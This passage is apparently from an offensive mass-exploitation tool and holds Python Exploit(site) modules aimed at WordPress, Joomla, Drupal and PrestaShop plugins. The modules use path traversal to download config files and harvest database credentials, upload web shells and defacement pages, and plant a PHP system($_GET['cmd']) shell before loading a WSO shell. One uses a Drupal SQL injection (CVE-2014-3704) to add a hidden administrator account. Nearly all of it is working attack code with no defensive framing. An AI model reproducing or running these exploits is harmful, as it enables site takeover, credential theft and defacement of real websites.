34 |         return printModule.returnNo(site, 'N/A', 'Wordpress Cherry-plugin', 'Wordpress')
35 | 


--------------------------------------------------------------------------------
/Exploits/Com_Hdflvplayer.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests, re
 3 | from Exploits import printModule
 4 | from Tools import getSMTP
 5 | 
 6 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
 7 | r = '\033[31m'
 8 | g = '\033[32m'
 9 | y = '\033[33m'
10 | b = '\033[34m'
11 | m = '\033[35m'
12 | c = '\033[36m'
13 | w = '\033[37m'
14 | 
15 | 
16 | def Exploit(site):
17 |     try:
18 |         Exp = 'http://' + site + \
19 |               '/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php'
20 |         GetConfig = requests.get(Exp, timeout=5, headers=Headers)
21 |         if 'JConfig' in str(GetConfig.content):
22 |             with open('result/Config_results.txt', 'a') as ww:
23 |                 ww.write('Full Config Path  : ' + Exp + '\n')
24 |             try:
25 |                 Gethost = re.findall("host = '(.*)';", str(GetConfig.content))
26 |                 Getuser = re.findall("user = '(.*)';", str(GetConfig.content))
27 |                 Getpass = re.findall("password = '(.*)';", str(GetConfig.content))
28 |                 Getdb = re.findall("db = '(.*)';", str(GetConfig.content))
29 |                 with open('result/Config_results.txt', 'a') as ww:
30 |                     ww.write(' Host:  ' + Gethost[1] + '\n' + ' user:  ' + Getuser[1] +
31 |                              '\n' + ' pass:  ' + Getpass[0] + '\n' + ' DB:    ' + Getdb[
32 |                                  0] + '\n---------------------\n')
33 |                 getSMTP.GETSmtpJoomConf(str(GetConfig.content))
34 |             except:
35 |                 return printModule.returnYes(site, 'N/A', 'Com_Hdflvplayer', 'Joomla')
36 |             return printModule.returnYes(site, 'N/A', 'Com_Hdflvplayer', 'Joomla')
37 |         else:
38 |             return printModule.returnNo(site, 'N/A', 'Com_Hdflvplayer', 'Joomla')
39 |     except:
40 |         return printModule.returnNo(site, 'N/A', 'Com_Hdflvplayer', 'Joomla')
41 | 


--------------------------------------------------------------------------------
/Exploits/Com_Joomanager.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests, re
 3 | from Exploits import printModule
 4 | from Tools import getSMTP
 5 | 
 6 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
 7 | r = '\033[31m'
 8 | g = '\033[32m'
 9 | y = '\033[33m'
10 | b = '\033[34m'
11 | m = '\033[35m'
12 | c = '\033[36m'
13 | w = '\033[37m'
14 | 
15 | def Exploit(site):
16 |     try:
17 |         Exp = 'http://' + site + \
18 |               '/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php'
19 |         GetConfig = requests.get(Exp, timeout=10, headers=Headers)
20 |         if 'JConfig' in str(GetConfig.content):
21 |             with open('result/Config_results.txt', 'a') as ww:
22 |                 ww.write('Full Config Path  : ' + Exp + '\n')
23 |             try:
24 |                 Gethost = re.findall("host = '(.*)';", str(GetConfig.content))
25 |                 Getuser = re.findall("user = '(.*)';", str(GetConfig.content))
26 |                 Getpass = re.findall("password = '(.*)';", str(GetConfig.content))
27 |                 Getdb = re.findall("db = '(.*)';", str(GetConfig.content))
28 |                 with open('result/Config_results.txt', 'a') as ww:
29 |                     ww.write(' Host:  ' + Gethost[1] + '\n' + ' user:  ' + Getuser[1] +
30 |                              '\n' + ' pass:  ' + Getpass[0] + '\n' + ' DB:    ' + Getdb[
31 |                                  0] + '\n---------------------\n')
32 |                 getSMTP.GETSmtpJoomConf(str(GetConfig.content))
33 |             except:
34 |                 return printModule.returnYes(site, 'N/A', 'Com_Joomanager', 'Joomla')
35 |             return printModule.returnYes(site, 'N/A', 'Com_Joomanager', 'Joomla')
36 |         else:
37 |             return printModule.returnNo(site, 'N/A', 'Com_Joomanager', 'Joomla')
38 |     except:
39 |         return printModule.returnNo(site, 'N/A', 'Com_Joomanager', 'Joomla')
40 | 
41 | 


--------------------------------------------------------------------------------
/Exploits/wp_support_plus_responsive_ticket_system.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests, re
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | 
14 | 
15 | def Exploit(site):
16 |     try:
17 |         Exp = 'http://' + site + \
18 |               '/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/' \
19 |               'downloadAttachment.php?path=../../../../../wp-config.php'
20 |         GetConfig = requests.get(Exp, timeout=5, headers=Headers)
21 |         if 'DB_PASSWORD' in GetConfig.content:
22 |             with open('result/Config_results.txt', 'a') as ww:
23 |                 ww.write('Full Config Path  : ' + Exp + '\n')
24 |             try:
25 |                 Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.content)
26 |                 Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.content)
27 |                 Getpass = re.findall("'DB_PASSWORD', '(.*)'", GetConfig.content)
28 |                 Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.content)
29 |                 with open('result/Config_results.txt', 'a') as ww:
30 |                     ww.write(' Host:  ' + Gethost[0] + '\n' + ' user:  ' + Getuser[0] +
31 |                              '\n' + ' pass:  ' + Getpass[0] + '\n' + ' DB:    ' + Getdb[
32 |                                  0] + '\n---------------------\n')
33 |             except:
34 |                 return printModule.returnYes(site, 'N/A', 'wp-support-plus', 'Wordpress')
35 |             return printModule.returnYes(site, 'N/A', 'wp-support-plus', 'Wordpress')
36 |         else:
37 |             return printModule.returnNo(site, 'N/A', 'wp-support-plus', 'Wordpress')
38 |     except:
39 |         return printModule.returnNo(site, 'N/A', 'wp-support-plus', 'Wordpress')
40 | 


--------------------------------------------------------------------------------
/Exploits/Com_s5_media_player.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests, re
 3 | from Exploits import printModule
 4 | from Tools import getSMTP
 5 | 
 6 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
 7 | r = '\033[31m'
 8 | g = '\033[32m'
 9 | y = '\033[33m'
10 | b = '\033[34m'
11 | m = '\033[35m'
12 | c = '\033[36m'
13 | w = '\033[37m'
14 | 
15 | def Exploit(site):
16 |     try:
17 |         Exp = 'http://' + site + \
18 |               '/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA='
19 |         GetConfig = requests.get(Exp, timeout=10, headers=Headers)
20 |         if 'JConfig' in str(GetConfig.content):
21 |             with open('result/Config_results.txt', 'a') as ww:
22 |                 ww.write('Full Config Path  : ' + Exp + '\n')
23 |             try:
24 |                 Gethost = re.findall("host = '(.*)';", str(GetConfig.content))
25 |                 Getuser = re.findall("user = '(.*)';", str(GetConfig.content))
26 |                 Getpass = re.findall("password = '(.*)';", str(GetConfig.content))
27 |                 Getdb = re.findall("db = '(.*)';", str(GetConfig.content))
28 |                 with open('result/Config_results.txt', 'a') as ww:
29 |                     ww.write(' Host:  ' + Gethost[1] + '\n' + ' user:  ' + Getuser[1] +
30 |                              '\n' + ' pass:  ' + Getpass[0] + '\n' + ' DB:    ' + Getdb[
31 |                                  0] + '\n---------------------\n')
32 |                 getSMTP.GETSmtpJoomConf(str(GetConfig.content))
33 |             except:
34 |                 return printModule.returnYes(site, 'N/A', 'Com_s5_media_player', 'Joomla')
35 |             return printModule.returnYes(site, 'N/A', 'Com_s5_media_player', 'Joomla')
36 |         else:
37 |             return printModule.returnNo(site, 'N/A', 'Com_s5_media_player', 'Joomla')
38 |     except:
39 |         return printModule.returnNo(site, 'N/A', 'Com_s5_media_player', 'Joomla')
40 | 


--------------------------------------------------------------------------------
/Exploits/wp_barclaycart.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | pagelinesExploitShell = 'files/settings_auto.php'
14 | 
15 | 
16 | def Exploit(site):
17 |     try:
18 |         ShellFile = {'Filedata': (pagelinesExploitShell, open(pagelinesExploitShell, 'rb')
19 |                                   , 'multipart/form-data')}
20 |         Exp = 'http://' + site + '/wp-content/plugins/barclaycart/uploadify/uploadify.php'
21 |         requests.post(Exp, files=ShellFile, timeout=10, headers=Headers)
22 |         Shell = 'http://' + site + '/wp-content/plugins/barclaycart/uploadify/' \
23 |                 + pagelinesExploitShell.split('/')[1]
24 |         GoT = requests.get(Shell, timeout=10, headers=Headers)
25 |         if GoT.status_code == 200:
26 |             CheckShell = requests.get('http://' + site + '/wp-content/neko.php', timeout=10, headers=Headers)
27 |             CheckIndex = requests.get('http://' + site + '/neko.htm', timeout=10, headers=Headers)
28 |             if 'neko!!' in CheckShell.content:
29 |                 with open('result/Shell_results.txt', 'a') as writer:
30 |                     writer.write(site + '/wp-content/neko.php' + '\n')
31 |             if 'neko!!' in CheckIndex.content:
32 |                 with open('result/Index_results.txt', 'a') as writer:
33 |                     writer.write(site + '/neko.htm' + '\n')
34 |                 return printModule.returnYes(site, 'N/A', 'barclaycart Plugin', 'Wordpress')
35 |             else:
36 |                 return printModule.returnNo(site, 'N/A', 'barclaycart Plugin', 'Wordpress')
37 |         else:
38 |             return printModule.returnNo(site, 'N/A', 'barclaycart Plugin', 'Wordpress')
39 |     except:
40 |         return printModule.returnNo(site, 'N/A', 'barclaycart Plugin', 'Wordpress')
41 | 


--------------------------------------------------------------------------------
/Exploits/CVE_2014_3704Drupal_add_Admin.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | 
14 | 
15 | def Exploit(site):
16 |     user = 'neko'
17 |     password = 'tegal1337'
18 |     Hash = '$S$CTo9G7Lx2FC8odOl10OKshDIRREshaeCN8.zqA9I3PT0X4cqLUJ3mBEdyl6juLsRE3EBTKNzhGXKiz5rMulPcvmBhxbLNn1'[:55]
19 | 
20 |     POSTDATA = {
21 |         'name[0%20;insert+into+users+(status,+uid,+name,+pass)+SELECT+1,'
22 |         '+MAX(uid)%2B1,+%27{}%27,+%27{}%27+FROM+users;insert+into+users_'
23 |         'roles+(uid,+rid)+VALUES+((SELECT+uid+FROM+users+WHERE+name+%3d+'
24 |         '%27{}%27),+3);;#%20%20]'.format(user, Hash, user): 'test3&name[0]',
25 |         'name[0]': 'test',
26 |         'pass': 'shit2',
27 |         'test2': 'test',
28 |         'form_build_id': '',
29 |         'form_id': 'user_login_block',
30 |         'op': 'Log+in'
31 |     }
32 |     agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
33 |     try:
34 |         resp = requests.post('http://' + site + '/?q=node&destination=node', timeout=10, data=POSTDATA, headers=agent)
35 |         if "mb_strlen() expects parameter 1" in str(resp.content):
36 |             with open('result/AdminTakeover_results.txt', 'a') as writer:
37 |                 writer.write(site + '/user/login\n  Username: {}\n'
38 |                                     '  Password: {}\n------------------------------------------\n'
39 |                              .format(user, password))
40 |             return printModule.returnYes(site, 'CVE-2014-3704', 'Drupal7 Add Admin', 'Drupal')
41 |         else:
42 |             return printModule.returnNo(site, 'CVE-2014-3704', 'Drupal7 Add Admin', 'Drupal')
43 |     except:
44 |         return printModule.returnNo(site, 'CVE-2014-3704', 'Drupal7 Add Admin', 'Drupal')
45 | 


--------------------------------------------------------------------------------
/Exploits/Com_JCEindex.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | 
 6 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
 7 | r = '\033[31m'
 8 | g = '\033[32m'
 9 | y = '\033[33m'
10 | b = '\033[34m'
11 | m = '\033[35m'
12 | c = '\033[36m'
13 | w = '\033[37m'
14 | Jce_Deface_image = 'files/vuln.gif'
15 | 
16 | def Exploit(site):
17 |     try:
18 |         fileDeface = {'Filedata': open(Jce_Deface_image, 'rb')}
19 |         post_data = {'upload-dir': '../../', 'upload-overwrite': '0', 'action': 'upload'}
20 |         Exp = 'http://' + site + \
21 |               '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form'
22 |         Post = requests.post(Exp, files=fileDeface, data=post_data, timeout=5, headers=Headers)
23 |         OtherMethod = '"text":"' + Jce_Deface_image.split('/')[1] + '"'
24 |         if OtherMethod in str(Post.content):
25 |             with open('result/Index_results.txt', 'a') as writer:
26 |                 writer.write(site + '/' + Jce_Deface_image.split('/')[1] + '\n')
27 |             return printModule.returnYes(site, 'N/A', 'Com_JCE', 'Joomla')
28 |         elif OtherMethod not in str(Post.content):
29 |             post_data2 = {'upload-dir': '../', 'upload-overwrite': '0', 'action': 'upload'}
30 |             Post = requests.post(Exp, files=fileDeface, data=post_data2, timeout=5, headers=Headers)
31 |             if OtherMethod in str(Post.content):
32 |                 with open('result/Index_results.txt', 'a') as writer:
33 |                     writer.write(site + '/images/' + Jce_Deface_image.split('/')[1] + '\n')
34 |                 return printModule.returnYes(site, 'N/A', 'Com_JCE Index', 'Joomla')
35 |             else:
36 |                 return printModule.returnNo(site, 'N/A', 'Com_JCE Index', 'Joomla')
37 |         else:
38 |             return printModule.returnNo(site, 'N/A', 'Com_JCE Index', 'Joomla')
39 |     except:
40 |         return printModule.returnNo(site, 'N/A', 'Com_JCE Index', 'Joomla')
41 | 


--------------------------------------------------------------------------------
/Exploits/viral_optinsExploit.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests, time, re
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | year = time.strftime("%y")
14 | month = time.strftime("%m")
15 | 
16 | def Exploit(site):
17 |     try:
18 |         defaceFile = {
19 |             'Filedata': ('neko.txt', open('files/neko.txt', 'rb'), 'text/html')
20 |         }
21 |         x = requests.post('http://' + site + '/wp-content/plugins/viral-optins/api/uploader/file-uploader.php',
22 |                           files=defaceFile, timeout=5, headers=Headers)
23 |         if 'id="wpvimgres"' in x.content:
24 |             uploader = site + '/wp-content/uploads/20' + year + '/' + month + '/neko.txt'
25 |             GoT = requests.get('http://' + uploader, timeout=5, headers=Headers)
26 |             find = re.findall('<img src="http://(.*)" height="', x.content)
27 |             GoT2 = requests.get('http://' + find[0], timeout=5, headers=Headers)
28 |             if 'neko!!' in GoT.content:
29 |                 with open('result/Index_results.txt', 'a') as writer:
30 |                     writer.write(site + '/wp-content/uploads/20' + year + '/' + month + '/neko.txt' + '\n')
31 |                 return printModule.returnYes(site, 'N/A', 'Viral-options', 'Wordpress')
32 |             elif 'neko!!' in GoT2.content:
33 |                 with open('result/Index_results.txt', 'a') as writer:
34 |                     writer.write(site + find[0] + '\n')
35 |                 return printModule.returnYes(site, 'N/A', 'Viral-options', 'Wordpress')
36 |             else:
37 |                 return printModule.returnNo(site, 'N/A', 'Viral-options', 'Wordpress')
38 |         else:
39 |             return printModule.returnNo(site, 'N/A', 'Viral-options', 'Wordpress')
40 |     except:
41 |         return printModule.returnNo(site, 'N/A', 'Viral-options', 'Wordpress')
42 | 


--------------------------------------------------------------------------------
/Exploits/com_media.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests, re
 3 | from Exploits import printModule
 4 | 
 5 | TextindeX = 'files/neko.txt'
 6 | 
 7 | def Exploit(site):
 8 |     headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0'}
 9 |     sess = requests.session()
10 |     try:
11 |         GET = sess.get('http://' + site + '/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name='
12 |                                           'jform_articletext&asset=com_content&author=&folder=',
13 |                        timeout=10, headers=headers)
14 |         if 'task=file.upload' in str(GET.content):
15 |             try:
16 |                 Uploader = re.findall('action="(.*)" id="uploadForm"', str(GET.content))[0]
17 |                 if Uploader.startswith("http://"):
18 |                     Uploader = Uploader.replace("http://", "")
19 |                 elif Uploader.startswith("https://"):
20 |                     Uploader = Uploader.replace("https://", "")
21 |                 else:
22 |                     pass
23 |                 POSTDATA = {'Filedata[]': open(TextindeX, 'rb')}
24 |                 sess.post('http://' + Uploader, files=POSTDATA, headers=headers, timeout=10)
25 |                 CheckIndex = requests.get('http://' + site + '/images/neko.txt', timeout=10,
26 |                                           headers=headers).content
27 |                 if 'neko!!' in str(CheckIndex):
28 |                     with open('result/Index_results.txt', 'a') as writer:
29 |                         writer.write(site + '/images/neko.txt\n')
30 |                     return printModule.returnYes(site, 'N/A', 'Com_Media', 'Joomla')
31 |                 else:
32 |                     return printModule.returnNo(site, 'N/A', 'Com_Media', 'Joomla')
33 |             except:
34 |                 return printModule.returnNo(site, 'N/A', 'Com_Media', 'Joomla')
35 |         else:
36 |             return printModule.returnNo(site, 'N/A', 'Com_Media', 'Joomla')
37 |     except:
38 |         return printModule.returnNo(site, 'N/A', 'Com_Media', 'Joomla')
39 | 


--------------------------------------------------------------------------------
/Exploits/Com_redmystic.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | from Tools import getSMTP
 5 | from Tools import wsoShellUploaderModule
 6 | 
 7 | payloadshell = '"neko!!<?php {});?>"'.format("system({}".format('$_GET["cmd"]'))
 8 | Headers = {
 9 |     'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'
10 | }
11 | 
12 | 
13 | def Exploit(site):
14 |     try:
15 |         requests.post('http://' + site + '/administrator/components/com_redmystic/chart/'
16 |                                          'ofc-library/ofc_upload_image.php?name=neko.php',
17 |                       data=payloadshell, headers=Headers, timeout=10)
18 |         Exp = requests.get('http://' + site + '/administrator/components/com_redmystic/'
19 |                                               'chart/tmp-upload-images/neko.php',
20 |                            headers=Headers, timeout=10)
21 |         if 'neko!!' in str(Exp.content):
22 |             with open('result/Shell_results.txt', 'a') as writer:
23 |                 writer.write(site + '/administrator/components/com_redmystic/chart/'
24 |                                     'tmp-upload-images/neko.php?cmd=uname -a' + '\n')
25 |             getSMTP.JooomlaSMTPshell(site + '/administrator/components/com_redmystic/chart/'
26 |                                             'tmp-upload-images/neko.php?cmd=id')
27 |             WSo = wsoShellUploaderModule.UploadWso(site + '/administrator/components/com_redmystic/chart/'
28 |                                                           'tmp-upload-images/neko.php?cmd=id')
29 |             if WSo == 'No':
30 |                 pass
31 |             else:
32 |                 with open('result/WSo_Shell.txt', 'a') as Wr:
33 |                     Wr.write('{}\n'.format(WSo))
34 | 
35 |             return printModule.returnYes(site, 'N/A', 'Com_redmystic', 'Joomla')
36 |         else:
37 |             return printModule.returnNo(site, 'N/A', 'Com_redmystic', 'Joomla')
38 |     except:
39 |         return printModule.returnNo(site, 'N/A', 'Com_redmystic', 'Joomla')
40 | 


--------------------------------------------------------------------------------
/Exploits/Presta_soopamobile.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | Jce_Deface_image = 'files/pwn.gif'
14 | ShellPresta = 'files/up.php'
15 | 
16 | 
17 | def Exploit(site):
18 |     try:
19 |         Exp = site + '/modules/soopamobile/uploadimage.php'
20 |         FileDataIndex = {'userfile': open(Jce_Deface_image, 'rb')}
21 |         FileDataShell = {'userfile': open(ShellPresta, 'rb')}
22 |         GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5, headers=Headers)
23 |         if 'success' in GoT.content:
24 |             IndexPath = '/modules/soopamobile/slides/' + Jce_Deface_image.split('/')[1]
25 |             CheckIndex = requests.get('http://' + site + IndexPath, timeout=5, headers=Headers)
26 |             if 'GIF89a' in CheckIndex.content:
27 |                 with open('result/Index_results.txt', 'a') as writer:
28 |                     writer.write(IndexPath + '\n')
29 |                 requests.post('http://' + Exp, files=FileDataShell, timeout=5, headers=Headers)
30 |                 ShellPath = '/modules/soopamobile/slides/' + ShellPresta.split('/')[1]
31 |                 CheckShell = requests.get('http://' + site + ShellPath, timeout=5, headers=Headers)
32 |                 if 'Vuln!!' in CheckShell.content:
33 |                     with open('result/Shell_results.txt', 'a') as writer:
34 |                         writer.write(ShellPath + '\n')
35 |                 return printModule.returnYes(site, 'N/A', 'soopamobile Module', 'Prestashop')
36 |             else:
37 |                 return printModule.returnNo(site, 'N/A', 'soopamobile Module', 'Prestashop')
38 |         else:
39 |             return printModule.returnNo(site, 'N/A', 'soopamobile Module', 'Prestashop')
40 |     except:
41 |         return printModule.returnNo(site, 'N/A', 'soopamobile Module', 'Prestashop')
42 | 


--------------------------------------------------------------------------------
/Exploits/Presta_soopabanners.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | Jce_Deface_image = 'files/pwn.gif'
14 | ShellPresta = 'files/up.php'
15 | 
16 | 
17 | def Exploit(site):
18 |     try:
19 |         Exp = site + '/modules/soopabanners/uploadimage.php'
20 |         FileDataIndex = {'userfile': open(Jce_Deface_image, 'rb')}
21 |         FileDataShell = {'userfile': open(ShellPresta, 'rb')}
22 |         GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=10, headers=Headers)
23 |         if 'success' in GoT.content:
24 |             IndexPath = '/modules/soopabanners/slides/' + Jce_Deface_image.split('/')[1]
25 |             CheckIndex = requests.get('http://' + site + IndexPath, timeout=10, headers=Headers)
26 |             if 'GIF89a' in CheckIndex.content:
27 |                 with open('result/Index_results.txt', 'a') as writer:
28 |                     writer.write(IndexPath + '\n')
29 |                 requests.post('http://' + Exp, files=FileDataShell, timeout=10, headers=Headers)
30 |                 ShellPath = '/modules/soopabanners/slides/' + ShellPresta.split('/')[1]
31 |                 CheckShell = requests.get('http://' + site + ShellPath, timeout=10, headers=Headers)
32 |                 if 'Vuln!!' in CheckShell.content:
33 |                     with open('result/Shell_results.txt', 'a') as writer:
34 |                         writer.write(ShellPath + '\n')
35 |                 return printModule.returnYes(site, 'N/A', 'soopabanners Module', 'Prestashop')
36 |             else:
37 |                 return printModule.returnNo(site, 'N/A', 'soopabanners Module', 'Prestashop')
38 |         else:
39 |             return printModule.returnNo(site, 'N/A', 'soopabanners Module', 'Prestashop')
40 |     except:
41 |         return printModule.returnNo(site, 'N/A', 'soopabanners Module', 'Prestashop')
42 | 


--------------------------------------------------------------------------------
/Exploits/Presta_vtermslideshow.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | Jce_Deface_image = 'files/pwn.gif'
14 | ShellPresta = 'files/up.php'
15 | 
16 | 
17 | def Exploit(site):
18 |     try:
19 |         Exp = site + '/modules/vtermslideshow/uploadimage.php'
20 |         FileDataIndex = {'userfile': open(Jce_Deface_image, 'rb')}
21 |         FileDataShell = {'userfile': open(ShellPresta, 'rb')}
22 |         GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=10, headers=Headers)
23 |         if 'success' in GoT.content:
24 |             IndexPath = '/modules/vtermslideshow/slides/' + Jce_Deface_image.split('/')[1]
25 |             CheckIndex = requests.get('http://' + site + IndexPath, timeout=10, headers=Headers)
26 |             if 'GIF89a' in CheckIndex.content:
27 |                 with open('result/Index_results.txt', 'a') as writer:
28 |                     writer.write(IndexPath + '\n')
29 |                 requests.post('http://' + Exp, files=FileDataShell, timeout=10, headers=Headers)
30 |                 ShellPath = '/modules/vtermslideshow/slides/' + ShellPresta.split('/')[1]
31 |                 CheckShell = requests.get('http://' + site + ShellPath, timeout=10, headers=Headers)
32 |                 if 'Vuln!!' in CheckShell.content:
33 |                     with open('result/Shell_results.txt', 'a') as writer:
34 |                         writer.write(ShellPath + '\n')
35 |                 return printModule.returnYes(site, 'N/A', 'vtermslideshow Module', 'Prestashop')
36 |             else:
37 |                 return printModule.returnNo(site, 'N/A', 'vtermslideshow Module', 'Prestashop')
38 |         else:
39 |             return printModule.returnNo(site, 'N/A', 'vtermslideshow Module', 'Prestashop')
40 |     except:
41 |         return printModule.returnNo(site, 'N/A', 'vtermslideshow Module', 'Prestashop')
42 | 


--------------------------------------------------------------------------------
/Exploits/Presta_simpleslideshow.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | Jce_Deface_image = 'files/pwn.gif'
14 | ShellPresta = 'files/up.php'
15 | 
16 | 
17 | def Exploit(site):
18 |     try:
19 |         Exp = site + '/modules/simpleslideshow/uploadimage.php'
20 |         FileDataIndex = {'userfile': open(Jce_Deface_image, 'rb')}
21 |         FileDataShell = {'userfile': open(ShellPresta, 'rb')}
22 |         GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5, headers=Headers)
23 |         if 'success' in GoT.content:
24 |             IndexPath = '/modules/simpleslideshow/slides/' + Jce_Deface_image.split('/')[1]
25 |             CheckIndex = requests.get('http://' + site + IndexPath, timeout=5, headers=Headers)
26 |             if 'GIF89a' in CheckIndex.content:
27 |                 with open('result/Index_results.txt', 'a') as writer:
28 |                     writer.write(IndexPath + '\n')
29 |                 requests.post('http://' + Exp, files=FileDataShell, timeout=5, headers=Headers)
30 |                 ShellPath = '/modules/simpleslideshow/slides/' + ShellPresta.split('/')[1]
31 |                 CheckShell = requests.get('http://' + site + ShellPath, timeout=5, headers=Headers)
32 |                 if 'Vuln!!' in CheckShell.content:
33 |                     with open('result/Shell_results.txt', 'a') as writer:
34 |                         writer.write(ShellPath + '\n')
35 |                 return printModule.returnYes(site, 'N/A', 'simpleslideshow Module', 'Prestashop')
36 |             else:
37 |                 return printModule.returnNo(site, 'N/A', 'simpleslideshow Module', 'Prestashop')
38 |         else:
39 |             return printModule.returnNo(site, 'N/A', 'simpleslideshow Module', 'Prestashop')
40 |     except:
41 |         return printModule.returnNo(site, 'N/A', 'simpleslideshow Module', 'Prestashop')
42 | 


--------------------------------------------------------------------------------
/Exploits/CVE_2015_4455_gravityformsindex.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from Exploits import printModule
 3 | 
 4 | r = '\033[31m'
 5 | g = '\033[32m'
 6 | y = '\033[33m'
 7 | b = '\033[34m'
 8 | m = '\033[35m'
 9 | c = '\033[36m'
10 | w = '\033[37m'
11 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
12 | index = 'files/rock.jpg'
13 | 
14 | def Exploit(site):
15 |     try:
16 |         UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
17 |         fileDeface = {'file': open(index, 'rb')}
18 |         post_data = {'field_id': '3', 'form_id': '1', 'gform_unique_id': '../../../../', 'name': 'neko.htm'}
19 |         post_data2 = {'field_id': '3', 'form_id': '1', 'gform_unique_id': '../../../../../', 'name': 'neko.htm'}
20 |         url = "http://" + site + '/?gf_page=upload'
21 |         requests.post(url, files=fileDeface, data=post_data, headers=UserAgent, timeout=5)
22 |         requests.post(url, files=fileDeface, data=post_data2, headers=UserAgent, timeout=5)
